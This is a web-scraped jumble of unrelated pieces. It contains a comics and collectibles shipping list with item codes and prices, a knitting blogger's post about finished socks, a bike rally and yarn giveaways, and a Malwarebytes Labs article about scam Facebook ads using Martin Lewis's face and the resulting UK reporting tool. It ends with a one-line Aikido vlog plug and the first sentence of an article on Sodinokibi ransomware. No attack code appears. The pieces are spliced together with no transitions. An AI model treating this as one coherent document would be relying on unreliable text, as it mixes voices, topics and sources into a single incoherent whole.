COLLECTION MOCHIMON PLUSH $69.99 AUG188689 DR SLUMP ARALE CHAN NENDOROID AF CAT EAR VER W/GATCHAN $59.99 NOV188832 DRAGON BALL STYLING SSGSS GOGETA FIG $15.00 NOV188833 DRAGON BALL STYLING SUPER SAIYAN BROLY FULL POWER FIG $18.00 NOV188834 DRAGON BALL STYLING SUPER SAIYAN GOD VEGETA FIG $15.00 JAN199088 DRAGON BALL SUPER ADVERGE MOTION 10PC MINI FIG DIS $8.00 OCT188353 DRAGON QUEST IV BRING ARTS ALENA AF $79.99 DEC188075 DRAGONBALL SUPER Z-BATTLE FRIEZA FIG $39.99 DEC188079 DRAGONBALL SUPER Z-BATTLE SSGSS GOKU FIG $39.99 DEC188081 DRAGONBALL SUPER Z-BATTLE SUPER SAIYAN BROLY FIG $39.99 DEC188082 DRAGONBALL SUPER Z-BATTLE SUPER SAIYAN SON GOKU FIG $39.99 FEB199043 F.R.I.E.N.D.S. 3D FIGURAL KEYRING 24PC BMB DS $6.99 JAN198916 FANTASY LIMITED EDITION 18.5IN LIGHTED DRAGON STATUE $200.00 DEC188203 FINAL FANTASY BRING ARTS CLOUD STRIFE ANOTHER FORM VAR AF (C $89.99 JAN199066 FINAL FANTASY CHOCOBO PERPETUAL CALENDAR $47.99 APR198790 FRIENDS LIFE SIZE STAND-UP 2 SET $59.95 OCT188814 GEM SER DIGIMON ADV WARGREYMON PVC STATUE $299.99 NOV188718 GODZILLA 1956 MOVIE POSTER 12-IN LONG AF $29.99 DEC188927 GUNDAM G FRAME MOBILE SUIT GUNDAM SET 1 5PC BMB DS $14.00 JUL189246 HATSUNE MIKU GT PROJECT RACING MIKU NENDOROID AF 2013 SEPANG $69.99 APR192369 INVADER ZIM 2020 WALL CALENDAR $14.99 OCT188494 IT PENNYWISE 400% BEA $144.99 NOV188506 JOJOS BIZARRE ADV STARDUST CRUS NORIAKI KAKYOIN NENDOROID AF $59.99 DEC188084 KANTAI COLLECTION KANCOLLE EXQ KONGOU FIG $24.99 AUG188366 KANTAI COLLECTION KANCOLLE KUMANO KAI-II FIGMA AF $114.99 AUG188909 KEOMOMIMI OUKOKU KOKUEI NOJA LOLI OJISAN NENDOROID AF $54.99 JAN193208 KIBBLE SCUFFLE CARD GAME $19.99 MAY192288 KID FLASH REBIRTH BY LEE T/S XL (RES) $19.95 MAY192289 KID FLASH REBIRTH BY LEE T/S XXL (RES) $22.95 OCT188186 KUROKOS BASKETBALL RYOTA KISE NENDOROID AF $54.99 APR192372 LEGEND OF ZELDA 2020 WALL CALENDAR $14.99 FEB199045 LORD OF THE RINGS 3D FOAM FIGURAL KEYRING 24PC BMB DS $6.99 DEC188087 LOVE LIVE SUNSHINE EXQ HANAMARU KUNIKIDA SUMMER FIG $24.99 DEC188089 LOVE LIVE SUNSHINE EXQ YOSHIKO TSUSHIMA SUMMER FIG $24.99 APR192382 MARVEL COMICS RETRO 2020 WALL CALENDAR $14.99 APR192383 MARVEL GOOD VS EVIL 2020 WALL CAL $14.99 OCT188601 MASHIN HERO PLAMAX MS-04 RYUJINMARU & SENJINMARU MDL KIT $69.99 JUN193102 MONOPOLY SCOOBY DOO BOARD GAME $39.95 JAN199316 MOTU 3.75IN REACTION FIG WV 5 GRIZZLOR $15.00 AUG188758 NARUTO SHIPPUDEN TSUNADE NENDOROID AF $54.99 NOV188426 NENDOROID DOLL BOY ARCHETYPE AF CREAM COLOR VER $24.99 NOV188428 NENDOROID DOLL GIRL ARCHETYPE AF CREAM COLOR VER $24.99 NOV188511 NENDOROID DOLL HAND PARTS 18PC SET CINNAMON VER $14.99 NOV188512 NENDOROID DOLL HAND PARTS 18PC SET CREAM VER $14.99 NOV188513 NENDOROID DOLL HAND PARTS 18PC SET PEACH VER $14.99 MAY189149 NEON GENESIS EVANGELION EVA EVANGELION SHOGO-KI MAFEX AF $145.99 NOV188142 NIER AUTOMATA MACHINE LIFEFORM COIN BANK $57.99 NOV188143 NIER EMIL COIN BANK $57.99 NOV188127 ONE PIECE 20TH ANNIVERSARY MASTERLISE MONKEY D LUFFY FIG $49.99 NOV188128 ONE PIECE 20TH ANNIVERSARY MASTERLISE PORTGAS D ACE FIG $49.99 NOV188129 ONE PIECE 20TH ANNIVERSARY MASTERLISE RORONOA ZORO FIG $49.99 NOV188130 ONE PIECE 20TH ANNIVERSARY MASTERLISE SABO FIG $49.99 NOV188131 ONE PIECE 20TH ANNIVERSARY MASTERLISE TRAFALGAR LAW FIG $49.99 DEC188091 ONE PIECE GLITTER & GLAMOUR X MATERIA KALIFA BLACK FIG $24.99 DEC188092 ONE PIECE GLITTER & GLAMOUR X MATERIA KALIFA WHITE FIG $24.99 DEC188093 ONE PIECE GRANDISTA GRANDLINE MEN PORTGAS D ACE FIG $24.99 DEC188094 ONE PIECE GRANDISTA MONKEY D LUFFY MANGA DIM FIG $68.99 OCT188819 ONE PIECE PORTRAIT OF PIRATES SA-MAX ZORO PVC SAN ZEN VER (C $239.99 DEC188106 ONE PIECE PORTRAIT OF PIRATES TONY TONY CHOPPER PVC OT VER ( $74.99 DEC188095 ONE PIECE WORLD COLOSSEUM 2 V5 FIG $24.99 DEC188096 ONE PIECE WORLD COLOSSEUM 2 V6 FIG $24.99 DEC188097 ONE PUNCH MAN DXF PREMIUM GENOS FIG $24.99 APR198854 PARAPPA THE RAPPER PJ BERRI 3.25IN VINYL FIGURE (Net) $15.00 JUN188099 PERSONA 5 SAKURA FUTABA 1/8 PVC FIG (O/A) $149.99 MAY198208 PINATA FIESTA MINI COLLECTIBLE 12CT SER1 DIS $8.99 AUG188518 PLACE FURTHER SHIRASE KOBUCHIZAWA NENDOROID AF $64.99 NOV188433 PLAMAX MF-31 MINIMUM FACTORY COLLETTA 1/20 PLASTIC MDL KIT ( $44.99 DEC188098 PMMM MOVIE REBELLION EXQ KYOKO SAKURA FIG $24.99 OCT188710 POP DC HEROES RED DEATH PX VINYL FIGURE $11.99 DEC188379 POP DRAGON BALL Z CHI CHI VINYL FIG $10.99 DEC188382 POP DRAGON BALL Z GOTEN VINYL FIG $10.99 DEC188385 POP DRAGON BALL Z RADDITZ VINYL FIG $10.99 MAR198731 POP GAMES FORTNITE S2 DJ YONDER VINYL FIG $10.99 MAR198732 POP GAMES FORTNITE S2 LEVIATHAN VINYL FIG $10.99 MAR198733 POP GAMES FORTNITE S2 LOOT LLAMA 10IN VINYL FIG $38.99 MAR198736 POP GAMES FORTNITE S2 TOMATOHEAD VINYL FIG $10.99 OCT188711 POP MARVEL NOVA PRIME PX VINYL FIGURE $12.99 FEB188723 RE ZERO STARTING LIFE EMILIA 1/7 PVC FIG SCHOOL TEACHER VER $195.99 MAY189141 REBUILD EVANGELION PARFORM EVANGELION 01 PVC FIG AWAKE VER ( $89.99 APR188815 REBUILD OF EVANGELION EVANGELION UNIT 01 PARFOM AF $89.99 DEC188108 SAILOR MOON PETIT CHARA 2PK SET KYOTO MARUBENI VER $49.99 AUG188911 SSSS GRIDMAN MAX COMBINE DX FULL POWER GRIDMAN AF $199.99 MAY192409 STAR TREK DISCOVERY FIG MAG #14 KLINGON CLEAVE SHIP $55.00 FEB193078 STAR TREK HEROCLIX RESISTANCE FUTILE FAST FORCES 6PK $16.99 FEB193077 STAR TREK HEROCLIX RESISTANCE FUTILE GRAV FEED DIS $94.76 MAR192473 STAR TREK STARSHIPS FIG MAG #150 USS ANTARES $22.95 MAR192474 STAR TREK STARSHIPS FIG MAG #151 BOMAR PATROL SHIP $22.95 DEC188101 SWORD ART ONLINE MEMORY DEFRAG EXQ SINON FIG $24.99 APR198300 TOKIDOKI CACTUS BUNNIES 16PC BMB DS $8.00 JAN199139 TOON TUMBLERS HARRY POTTER CHARM CASTLE GLASS $10.99 FEB198194 TOPPS 2019 ARCHIVES SIG SER BASEBALL ACTIVE ED T/C BOX $49.99 MAR198215 TOPPS 2019 DIAMOND ICONS BASEBALL T/C BOX $1499.99 JAN199288 TOPPS 2019 WWE SUMMERSLAM T/C BOX $2.99 APR198791 TOY STORY 4 3D FOAM BAG CLIPS 24PC BMB DS $5.99 MAY198078 WHOS YOUR LLAMA FIG BMB SER2 ASST $7.99 MAY198209 WHOS YOUR LLAMA PLUSH SER2 ASST $7.99 JAN198651 WIZARD OF OZ WITCHES BREW TEAPOT $28.00 MAY192414 WWE FIG CHAMPIONSHIP COLL #1 AJ STYLES $19.95 MAY192415 WWE FIG CHAMPIONSHIP COLL #2 UNDERTAKER $19.95 MAY192416 WWE FIG CHAMPIONSHIP COLL #3 THE ROCK $19.95 DEC188085 X JAPAN Q-POSKET HIDE V3 FIG $24.99 DEC188086 X JAPAN Q-POSKET HIDE V3 METALLIC FIG $24.99 DEC188102 ZERO STARTING LIFE IN ANOTHER WORLD REM & RAM PUDDING FIG (C $62.99 Shipping the week of July 31. PREMIER PUBLISHERS BOOM! STUDIOS MAY191257 STEVEN UNIVERSE ONGOING #30 CVR A MAIN PENA $3.99 MAR191313 STEVEN UNIVERSE ONGOING TP VOL 05 FIND A WAY $14.99 MAR191292 WWE PHENOMENAL ONE TP $19.99 DARK HORSE COMICS MAR190325 DISNEY FRANKENSTEIN STARRING DONALD DUCK TP $10.99 MAY190264 DISNEY FROZEN HERO WITHIN #2 KAWAII CREATIVE STUDIO $3.99 MAY190233 FIGHT CLUB 3 #7 CVR A MACK (MR) $3.99 MAY190234 FIGHT CLUB 3 #7 CVR B MORRIS (MR) $3.99 DEC180425 HELLBOY MUG $12.99 MAY190215 MANOR BLACK #1 CVR A CROOK $3.99 MAY190216 MANOR BLACK #1 CVR B BRERETON $3.99 MAY190225 STRANGER THINGS SIX #3 CVR A BRICLOT $3.99 MAY190226 STRANGER THINGS SIX #3 CVR B WIJNGAARD $3.99 MAY190227 STRANGER THINGS SIX #3 CVR C CROOK $3.99 MAY190228 STRANGER THINGS SIX #3 CVR D SATTERFIELD PHOTO $3.99 APR190333 UMBRELLA ACADEMY HAZEL & CHA CHA MUG $12.99 NOV180282 UMBRELLA ACADEMY WHEN EVIL RAINS MUG $12.99 DC COMICS MAY190376 AMERICAN CARNAGE #9 (MR) $3.99 NOV180527 AUTHORITY OMNIBUS HC $99.99 MAY190360 BATMAN LAST KNIGHT ON EARTH #2 $5.99 MAY190387 BATMAN SECRET FILES #2 $4.99 JUN190448 BATMAN WHO LAUGHS #7 $4.99 APR190534 DC BOMBSHELLS THE DELUXE ED HC BOOK 02 $29.99 JUN190003 DC PREVIEWS #16 AUGUST 2019 EXTRAS PI MAR190470 DEAR JUSTICE LEAGUE TP $9.99 MAY190415 GREEN LANTERN ANNUAL #1 $4.99 APR190554 INJUSTICE 2 HC VOL 06 $24.99 MAY190431 JUSTICE LEAGUE DARK ANNUAL #1 $4.99 MAY190494 KITCHEN TP NEW ED (MR) $12.99 MAY190443 RED HOOD OUTLAW ANNUAL #3 $4.99 NOV180575 SUPERMAN THE GOLDEN AGE OMNIBUS HC VOL 06 $125.00 APR190569 WONDER WOMAN BY JOHN BYRNE HC VOL 03 $39.99 DC COMICS/DC COLLECTIBLES DEC180682 DARK KNIGHTS METAL BATMAN & DARKSEID BABY STATUE $85.00 DYNAMITE ENTERTAINMENT FEB191053 BETTIE PAGE UNBOUND #1 BRIAN KONG RMRK ED $89.99 MAY191177 GONZALEZ VAMPIRELLA 50TH ANN PREMIUM ENAMEL PIN $12.99 MAY191019 JOE JUSKO VAMPIRELLA 50TH ANNIVERSARY GICLEE $699.99 MAY191085 KISS END #4 CVR A SAYGER $3.99 MAY191086 KISS END #4 CVR B BROWN $3.99 MAY191087 KISS END #4 CVR C SCHOONOVER $3.99 MAY191088 KISS END #4 CVR D PHOTO $3.99 MAY191176 LINSNER VAMPIRELLA 50TH ANN PREMIUM ENAMEL PIN $12.99 FEB198621 PATHFINDER SEONI BATTLE READY AP STATUE $275.00 JAN191275 PATHFINDER SEONI BATTLE READY DIAMOND EYE STATUE $399.99 JAN191274 PATHFINDER SEONI BATTLE READY STATUE $249.99 JAN191273 PATHFINDER SEONI SPELLCASTING DIAMOND EYE STATUE $349.99 JAN191272 PATHFINDER SEONI SPELLCASTING STATUE $199.99 MAY191101 RED SONJA BIRTH OF SHE DEVIL #2 PARILLO VIRGIN CVR $50.00 MAY191114 RED SONJA LORD OF FOOLS ONE SHOT $4.99 MAR191084 SWEET VALLEY HIGH GN $14.99 MAY191181 VAMPIRELLA #1 HUGHES CGC GRADED CVR $89.99 MAY191183 VAMPIRELLA #1 JUSKO CGC GRADED CVR $89.99 MAY191184 VAMPIRELLA #1 MARCH CGC GRADED CVR $89.99 MAY191182 VAMPIRELLA #1 ROSS CGC GRADED CVR $89.99 MAY191175 VAMPIRELLA 50TH ANN ULTRA TRADING CARDS BOX (12 PACKS) PI MAY191174 VAMPIRELLA 50TH ANN ULTRA TRADING CARDS INDIVIDUAL FOIL PACK PI APR191010 WARLORD OF MARS ATTACKS #1 MARC D`ALFONSO VIRGIN CVR $50.00 IDW PUBLISHING APR198597 (USE MAY198983) CANTO #1 2ND PTG $3.99 MAY190642 CANTO #2 CVR A ZUCKER $3.99 APR190689 CLIVE BARKER GREAT & SECRET SHOW DLX ED TP $29.99 MAY198001 CROW HACK SLASH #1 2ND PTG $3.99 MAY190628 CROW HACK SLASH #2 CVR A SEELEY $3.99 MAY190603 ENEMY OF PEOPLE TP CARTOONISTS JOURNEY $24.99 JAN190845 ENOLA HOLMES CASE OF LEFTHANDED LADY HC $14.99 MAY190638 GEARS OF WAR POP ONE-SHOT #1 CVR A PENA $4.99 APR190613 GI JOE A REAL AMERICAN HERO #265 CVR A DIAZ $3.99 APR190614 GI JOE A REAL AMERICAN HERO #265 CVR B FRAGA $3.99 APR190636 GLOW #4 CVR A TEMPLER $3.99 MAR190683 GOOSEBUMPS HORRORS OF THE WITCH HOUSE #3 FENOGLIO $3.99 OCT180711 JOE HILL THE CAPE FALLEN #4 CVR A HOWARD & DANIEL $3.99 OCT180712 JOE HILL THE CAPE FALLEN #4 CVR B DANIEL $3.99 FEB190652 MARVEL ACTION SPIDER-MAN #6 JONES $3.99 MAY198121 ROAD OF BONES #1 3RD PTG $3.99 APR190610 SAMURAI JACK LOST WORLDS #3 CVR A THOMAS $3.99 APR190611 SAMURAI JACK LOST WORLDS #3 CVR B FULLERTON $3.99 MAY190595 SONIC THE HEDGEHOG TANGLE & WHISPER #1 CVR A STANLEY $3.99 MAY190596 SONIC THE HEDGEHOG TANGLE & WHISPER #1 CVR B FOURDRAINE $3.99 MAY190604 STAR WARS ADVENTURES #24 CVR A LEVENS $3.99 MAY190605 STAR WARS ADVENTURES #24 CVR B BRACCHI $3.99 APR190648 SUKEBAN TURBO TP $17.99 MAY190564 TMNT ONGOING #96 CVR A WACHTER $3.99 MAY190565 TMNT ONGOING #96 CVR B EASTMAN $3.99 MAY190561 TMNT URBAN LEGENDS #15 CVR A FOSCO $3.99 MAY190562 TMNT URBAN LEGENDS #15 CVR B FOSCO & LARSEN $3.99 MAY190576 TRANSFORMERS #10 CVR A DEER $3.99 MAY190577 TRANSFORMERS #10 CVR B MCGUIRE SMITH $3.99 MAY190611 UNCLE SCROOGE #47 CVR A MAZZARELLO $4.99 IMAGE COMICS MAY190055 BEAUTY #28 CVR A HAUN & FILARDI (MR) $3.99 MAY190056 BEAUTY #28 CVR B NACHLIK & FILARDI (MR) $3.99 MAY198174 FADE OUT TP VOL 01 (NEW PTG) (MR) $12.99 MAY190073 ICE CREAM MAN #13 CVR A MORAZZO & OHALLORAN (MR) $3.99 MAY190074 ICE CREAM MAN #13 CVR B CRAIG (MR) $3.99 MAY190122 ICE CREAM MAN PIN $9.99 MAY190119 ICE CREAM MAN T/S LG $24.99 MAY190118 ICE CREAM MAN T/S MED $24.99 MAY190117 ICE CREAM MAN T/S SM $24.99 MAY190120 ICE CREAM MAN T/S XL $24.99 MAY190121 ICE CREAM MAN T/S XXL $26.99 MAY190086 MONSTRESS #24 (MR) $3.99 MAY190037 PAPER GIRLS #30 $4.99 MAY190091 RAT QUEENS #17 (MR) $3.99 MAR190232 REALM #14 CVR A HAUN & FILARDI (MR) $3.99 MAR190233 REALM #14 CVR B ALLISON (MR) $3.99 MAY190105 SPAWN #299 CVR A MCFARLANE $2.99 MAY190106 SPAWN #299 CVR B MCFARLANE VIRGIN $2.99 MAY190107 SPAWN #299 CVR C B&W MCFARLANE $2.99 MAY198901 WALKING DEAD #193 2ND PTG (MR) $3.99 MAY190125 WALKING DEAD SOMETHING TO FEAR CARD GAME $20.00 MARVEL COMICS MAY190746 AVENGERS #22 $3.99 MAY190862 BLACK PANTHER #14 $3.99 APR190800 CAPTAIN AMERICA #12 $3.99 MAY190904 CONAN THE BARBARIAN #8 $3.99 MAY190967 DAREDEVIL BY CHIP ZDARSKY TP VOL 01 KNOW FEAR $15.99 MAY190965 DEADPOOL SKOTTIE YOUNG TP VOL 02 $17.99 MAY190748 DEATHS HEAD #1 $3.99 MAY190985 ELEKTRA TP ASSASSIN NEW PTG (MR) $19.99 MAY190866 FANTASTIC FOUR #12 $4.99 MAY190981 FANTASTIC FOUR TP FANTASTIC ORIGINS $15.99 MAY190832 FRIENDLY NEIGHBORHOOD SPIDER-MAN #9 $3.99 MAY190833 FRIENDLY NEIGHBORHOOD SPIDER-MAN #9 WOO DAE SHIM CARNAGE-IZE $3.99 MAY190986 INCREDIBLE HERCULES COMPLETE COLLECTION TP VOL 01 $39.99 MAY190966 INVADERS TP VOL 01 WAR GHOSTS $17.99 MAY190869 MARVEL COMICS PRESENTS #7 $4.99 JUN190002 MARVEL PREVIEWS VOL 04 #25 AUGUST 2019 EXTRAS $1.25 MAY190875 MARVEL TEAM-UP #4 $3.99 FEB190981 MARVELS MONSTER-SIZED HC $75.00 MAY190703 POWERS OF X #1 $5.99 MAY190887 RUNAWAYS #23 $3.99 MAY190792 SECRET WARPS IRON HAMMER ANNUAL #1 $4.99 MAY190987 SPIDER-GIRL COMPLETE COLLECTION TP VOL 02 $39.99 MAY190922 STAR WARS AOR SPECIAL #1 $4.99 MAY198794 STAR WARS GALAXYS EDGE #1 3RD PTG SLINEY VAR $3.99 MAY198795 STAR WARS GALAXYS EDGE #2 2ND PTG SLINEY VAR $3.99 MAY198796 STAR WARS GALAXYS EDGE #3 2ND PTG SLINEY VAR $3.99 MAY190932 STAR WARS GALAXYS EDGE #4 $3.99 MAY190963 SUPERIOR SPIDER-MAN TP VOL 01 FULL OTTO $17.99 MAY190849 THANOS #4 $3.99 MAY190773 TRUE BELIEVERS ABSOLUTE CARNAGE MIND BOMB #1 $1.00 MAY190774 TRUE BELIEVERS ABSOLUTE CARNAGE PLANET OF SYMBIOTES #1 $1.00 MAY190881 VENOM ANNUAL #1 $4.99 MAY190969 X-23 TP VOL 02 X-ASSASSIN $17.99 MAY190980 X-MEN MILESTONES TP MUTANT MASSACRE $34.99 COMICS & GRAPHIC NOVELS FEB198305 ANGEL #3 CVR A MAIN $3.99 FEB198899 ANGEL #3 CVR B PREORDER BUONCRISTIANO $3.99 MAY191658 DF AMAZING SPIDERMAN #1 SGN RMRK HIDALGO SKETCH $89.99 MAY191654 DF CHAMPIONS #1 SGN RMRK HAESER SKETCH $89.99 MAY191663 DF DETECTIVE #1000 WRAPAROUND B&W CVR JURGENS & NOWLAN $80.00 MAY191662 DF DETECTIVE #1000 WRAPAROUND CVR JURGENS & NOWLAN $39.99 MAY191664 DF DETECTIVE #1000 WRAPAROUND PENCIL SKETCH JURGENS $399.99 MAR191702 DF DETECTIVE COMICS #1000 JURGENS & NOWLAN GOLD SGN JURGENS $89.99 FEB191693 DF DETECTIVE COMICS #1000 SGN JURGENS $49.99 MAY191640 DF HOUSE OF X #1 CGC GRADED $99.99 MAY191639 DF HOUSE OF X #1 SGN QUESADA $99.99 MAY191651 DF INCREDIBLE HULK LAST CALL #1 SGN DAVID $29.99 MAY191645 DF JIMMY OLSEN #1 SGN LIEBER $29.99 MAY191666 DF JULY 4TH CELEBRATION STARTER SET $17.76 MAY191646 DF LOIS LANE #1 SGN PERKINS $29.99 MAR191715 DF MAJOR X #1 CGC GRADED $89.99 MAY191642 DF POWERS OF X #1 CGC GRADED $99.99 MAY191641 DF POWERS OF X #1 SGN QUESADA $99.99 MAY191643 DF SILVER SURFER BLACK #1 SGN CATES $49.99 MAY191644 DF SILVER SURFER BLACK #1 SGN CATES PLUS 1 $64.98 MAY191657 DF SPIDERMAN ANNUAL SPIDERHAM #1 SGN LIM $29.99 MAY191656 DF TRUE BELIEVERS SECRET SPIDERHAM #1 SGN DEFALCO $49.99 MAY191655 DF TRUE BELIEVERS TAILS SPIDERHAM #1 SGN DEFALCO $49.99 MAY191650 DF UNCANNY XMEN #544 SGN STAN LEE $799.99 MAY191665 DF WOLVERINE #1 SPECIAL EDITION $49.99 MERCHANDISE DIAMOND SELECT TOYS LLC MAR192441 DC GALLERY DARK KNIGHT RETURNS BATMAN & CARRIE DLX PVC FIG $69.99 APR192524 IT MOVIE PENNYWISE VINIMATE $9.99 JAN198862 KINGDOM HEARTS 3 SELECT SERIES 2 GF SORA & G HEARTLESS AF $29.99 JAN198860 KINGDOM HEARTS 3 SELECT SERIES 2 HERCULES & PEARL DUSK AF $29.99 JAN198861 KINGDOM HEARTS 3 SELECT SERIES 2 TS SORA & G HEARTLESS AF $29.99 FEB192445 MARVEL GALLERY DAZZLER COMIC PVC FIGURE $49.99 JAN192552 MARVEL GALLERY SPIDER-MAN PS4 PVC FIGURE $49.99 SEP182339 MARVEL MILESTONES AVENGERS 3 THANOS STATUE $350.00 OCT182224 MARVEL PREMIERE HOBGOBLIN STATUE $150.00 FEB192448 MARVEL SELECT PSYLOCKE AF $29.99

I am trudging along here – still looking forward (rather desperately) to the day (28 days) from now when the Bike Rally is finished and things shift around here.  I am not even sure what I will do that day, though I’ve reached a phase of hopefulness where I start piling knitting projects up around the house so I can look at them as I walk by. I can only imagine that August 17th is a day that the Wild Knitting Rumpus will begin, assuming I am conscious.  Between now and then I’m trying to get all this done without completely compromising my sanity, family or what’s left of my relationships. (I have given up on the house, but have adopted AlisonH’s tip for floor cleaning from the comments on the last post, so things are better there.)  Last week some friends invited us up to their cottage, and my love for the Canadian wilds being what it is, I managed to find a way to get myself up there on short notice for three glorious days.  (Joe,  Megan and Elliot managed to stay up there longer, but I jumped on the train bright and early on Thursday for a series of Bike Rally Meetings that couldn’t be missed. You can only imagine the bitterness I felt leaving that kid behind in one of my favourite places.)

We spent the few days I was able to be there swimming,  trying to convince Elliot to  go in the lake (he was fine by the end, but resistance was initially high) and l tried to write to you, but I had to use nap time for Rally Business, and usually if he’s awake and we’re together, Elliot says “Gammy?” every 12 seconds, and I am helpless not to answer him.  I wanted to write and say that despite the state of my life (and improved status of the kitchen floor) I did finish my June Socks, and I had a good enough time knitting them that I’d happily start the pair over.

Pattern is Paragon Socks, Yarn is West Yorkshire Spinners Signature 4 ply in Cardamom.

They look fussier than they are to knit, which is something I like a lot in a pair of socks, and the pattern itself was memorizable – though not until the last repeat of the second sock, in my case, but if your head isn’t full of Bike Rally you might have more room for storing that.)

I’d tell you I loved the yarn too- but that should be obvious by now, since I think it’s turned up on the blog about three times in the last year or so.  Great stuff.

I’ve got the next pair of socks on the needles, but they’re just plain self-striping, because I see how things are this month and wanted to make it a little easier on myself.  (I can see now that this would have been a good month to investigate the perplexing world of hand knit ankle socks, but it’s too late now.) I finished the mini-pom-pom neck thing too, so I’ll get some pictures of that, and look! While I was walking around another pair of socks fell off the needles.

Yarn is Cozy Knitter’s “Celebrate the Night” (I think. I’ve misplaced the ball band again, which isn’t surprising since I can’t even remember when I started these, never mind anything else about them.)

Absolutely no pattern whatsoever, I just banged them out. Top down,  round and round, 2.25mm needles, 68 stitches, German short row heels over half the stitches, and my standard toe. (My standard toe probably isn’t yours because I’m opposed to the pointiness, we can talk about it another time.)

Into the long range planning box for them- it’s actually not looking too shabby in there, I remember the last time I did the Self-imposed-sock-of-the-month-club it was an easy Christmas, I was so far ahead. It’s a lovely thing to think about, since I’m so far behind on everything else right now.

Speaking of behind -let’s get some Karmic Balancing gifts done, because you all are amazing.  Team Knit is still inching towards their goals, and it’s you all we have to thank for it.  I  hope we’re going to make it. If you’re wondering what’s going on here read this:  and Team Knit this year is Me, Ken, Cameron and Pato. Please help us spread the word.

First, a wonderful gift from Tanja Luescher, she’s a designer who’s always one of the first in my inbox with an offer to help. We’ve never met, but I think she’s pretty great.)

Tanja is offering 10 ebooks (20 really, but we’ll do another 10 anther time) Kathryn, Sonja, Rita, Karen, Janis, Sarah, Susanna, Cara, Jessica, and Kelly can all choose between Stories of Inspiration, Selfstriping, Hubby needs Socks, The Cat Collection OR you these lucky knitters can create their own ebook of any 7 patterns.  Thanks all. (And I am going to buy the socks one. I think I found the perfect pair.)

Michele wrote and said that she has three gorgeous gifts that need new homes – thanks Michele! Violets by Mary Scott Huff – the entire kit. (Michele loves this a lot, but is a realist about it’s future with her. I hope that Barbara M loves it and has time. 1 skein (1000 yards) of Tanis Fiber Arts pink label lace weight – variegated graphite is the colourway. Michele found out she’s not a fan of laceweight – so off it goes to Tamara G. 2 skeins (420 yards each) of Tanis Fiber Arts red label cashmere/silk twist – mauve blossoms. (Michele didn’t say why these need rehoming, so I assume it’s straight-up crazy generosity.)  Good news Sarah H, these are winging your way!

Mary E Rose is another designer, and Mary’s written to say that she’d like to give away a free pattern to TEN knitters.  I spent some time with her portfolio, and Smocked Leaves and The White Queen’s Shawl are two I’m putting in my queue.

Good luck choosing to  Lesley E, Brooke S, Wendy N, Dari T, Amanda G, Christine E, Nancy S, Kathy F, Sam M, and Cathy W. There’s a lot of amazing patterns there.

Christina has these three beautiful skeins of Titus (in Coal) to give away.  (What a neat yarn, 50% Wensleydale, 20% BFL, and 30% alpaca – most of that from the UK.)

Those three beauties will be making their way to Lisa H. Lisa and Christina, thank you!

Terry’s got two skeins of Knitpicks Hawthorne Fingering in Burnside that she’d rather inexplicably like to give up. (Must be just that she’s nice.)

That’s more than 600m of amazing that will be making it’s way to Julie A.

But wait there’s more! Brooke’s got two skeins of Three Irish Girls Yarn ‘Adore’ sock yarn, in the ‘Everlasting Gobstopper’ colourway, making it’s way from her house to Josephine P’s. I hope it makes her happy.

Still on the sock yarn train, Linda H has two ever so pretty ones – Sweet Skein o-Mine, in the colourway St. Andrew’s Summer – headed to Cathy A. Thanks both!

That’s it for today, a whole whack of gifts done, and I’ve emailed the 27 lucky winners, and the generosity in my inbox overfloweth.  There’s much more to come.  For now, I’m off to look over about 7 spreadsheets that contain more details about a small moving city of cyclists than anyone could ever hope to memorize, and hope to drill enough parts of it into my head to get this thing off the ground. Oh. I also have to figure out the cutlery.  Who knew?

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

As a trusted face in consumer causes, scammers bolting Lewis’ face onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000. 

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine were all present and accounted for, and they all were situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. They’re not allowed in the EU, which means scammers set up shop outside its borders, claiming to have base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million pounds to Citizen’s Advice to create a UK Scams Action Project, and they’d also launch a UK-centric scam ad reporting tool complete with dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads presumably promoting the new services.

https://youtu.be/xxv0izTxrjg

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have turned into tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all. Reporting is a case of clicking the dots above any ad, and selecting the appropriate options before sending.

Click to enlarge

Click to enlarge

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Just finished uploading my latest vlog to YouTube. It's about the 3 things you can expect as a beginner in Aikido.

Click Here and Please take a look, comment, share and subscribe to my channel!

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

